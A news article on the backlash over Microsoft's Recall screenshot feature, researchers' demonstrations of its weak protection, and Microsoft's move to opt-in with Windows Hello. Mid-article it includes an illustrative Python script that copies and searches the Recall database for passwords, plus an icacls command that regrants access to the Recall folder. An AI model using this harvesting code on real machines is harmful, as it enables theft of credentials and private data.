
Microsoft rethinks Recall feature for Copilot after backlash over security


Microsoft’s upcoming AI-powered Windows “Recall” feature, which captures screenshots of a user’s active screen every few seconds, will undergo changes following backlash from security experts.

The feature drew immediate criticism from consumers and industry professionals after it was announced on May 20, with Malwarebytes calling it a “built-in keylogger” and software engineer and Web3 critic Molly White calling it “spyware.”

The concerns were compounded by the fact that Recall does not, according to Microsoft, redact sensitive information such as passwords or financial details from the snapshots it takes. This could make the database of Recall snapshots on a user’s computer a gold mine for hackers, concentrating large amounts of sensitive data in one place and making it easily searchable via the AI-powered search feature.

Microsoft insisted users’ privacy was protected due to all Recall data being stored locally and encrypted by Device Encryption or BitLocker. The feature, which would be enabled by default on Copilot+ PCs, could also be disabled and configured to not record specific sites and apps.

However, in the weeks since Recall was announced, multiple security pros have put available previews to the test and demonstrated ways the Recall database can be accessed and exploited to steal sensitive data en masse.

For example, Alex Hagenah, head of cyber controls at SIX Group and technical advisory board member at HackerOne, developed a “very simple” proof-of-concept tool called “TotalRecall,” which copies, searches and extracts information from the Recall database file.
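Public reporting around TotalRecall indicates the Recall index is an ordinary, locally stored SQLite database of OCR’d screen text, which is why simple file and SQL operations are enough to mine it. The sketch below illustrates that idea in Python; the database path, table name and column name are assumptions for illustration, not a verified Recall schema or Hagenah’s actual code.

```python
# Hypothetical sketch of a TotalRecall-style extractor. The database path,
# table name and column name below are assumptions for illustration; they
# are not a verified Recall schema.
import shutil
import sqlite3
import sys
from pathlib import Path

# Assumed location of the Recall index on a Copilot+ PC (illustrative only).
RECALL_DB = Path.home() / "AppData" / "Local" / "CoreAIPlatform.00" / "UKP" / "ukg.db"
WORKING_COPY = Path("recall_copy.db")


def search_snapshots(term: str) -> list[tuple]:
    """Copy the database, then run a plain SQL search over the captured text."""
    # Copy first so the live file is never locked or modified.
    shutil.copy2(RECALL_DB, WORKING_COPY)
    conn = sqlite3.connect(WORKING_COPY)
    try:
        # "WindowCaptureText" and "text" are placeholder names standing in for
        # whatever table and column actually hold the OCR'd screen text.
        return conn.execute(
            "SELECT * FROM WindowCaptureText WHERE text LIKE ?",
            (f"%{term}%",),
        ).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    term = sys.argv[1] if len(sys.argv) > 1 else "password"
    for row in search_snapshots(term):
        print(row)
```

The point is simply that once the database file is readable, no exploit is required: standard file copying and SQL queries surface everything Recall has captured.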

Additionally, James Forshaw, a security researcher at Google Project Zero, published a blog post about bypassing access control lists that includes an edit showing the Recall database can be accessed without administrative privileges, either by using a token from the Windows AIXHost.exe process or by simply rewriting the discretionary access control list (DACL), since the database files are owned by the user.
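Forshaw’s DACL observation is worth spelling out: because the snapshot store is owned by the logged-in user, that user (or malware running as that user) can grant itself access with built-in tooling and no administrative token. A hedged illustration follows; the directory path is an assumption, and this is exactly the kind of file access Microsoft’s newly announced Windows Hello-gated decryption is meant to render insufficient on its own.

```python
# Hypothetical illustration of the DACL-rewrite route: since the user owns
# the Recall data directory, that user can regrant themselves read access
# with the built-in icacls utility. The path below is an assumption for
# illustration, not a confirmed Recall location.
import getpass
import subprocess
from pathlib import Path

# Assumed location of the Recall snapshot store (illustrative only).
recall_dir = Path.home() / "AppData" / "Local" / "CoreAIPlatform.00" / "UKP"

# Recursively grant the current user read access to the directory tree.
subprocess.run(
    ["icacls", str(recall_dir), "/grant", f"{getpass.getuser()}:(OI)(CI)R", "/t"],
    check=True,
)
```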

In response to “customer feedback,” Microsoft announced in a blog post on Friday that Recall would no longer be activated by default, requiring users to opt in to use the feature. Additionally, users will need to complete the Windows Hello biometric enrollment process to enable Recall, lowering the chance that a hacker could enable it on the machine of a user who had opted out.

Proof of presence through Windows Hello will be required to view the Recall timeline and use the AI-powered search tool, and the snapshots will only be decrypted upon user authentication via Windows Hello Enhanced Sign-in Security, Microsoft said.

“We want to reinforce what has previously been shared from David Weston, vice president of Enterprise and OS Security, about how Copilot+ PCs have been designed to be secure by default,” the blog post stated.

Kevin Beaumont, a security researcher and former senior threat intelligence analyst at Microsoft, who has been a vocal critic of Recall since its announcement, responded positively to the update.

“Turns out speaking up works,” Beaumont wrote on X.

“There are obviously going to be devils in the details – potentially big ones – but there’s some good elements here. Microsoft needs to commit to not trying to sneak users to enable it in the future, and it needs turning off by default in Group Policy and Intune for enterprise orgs,” Beaumont added.
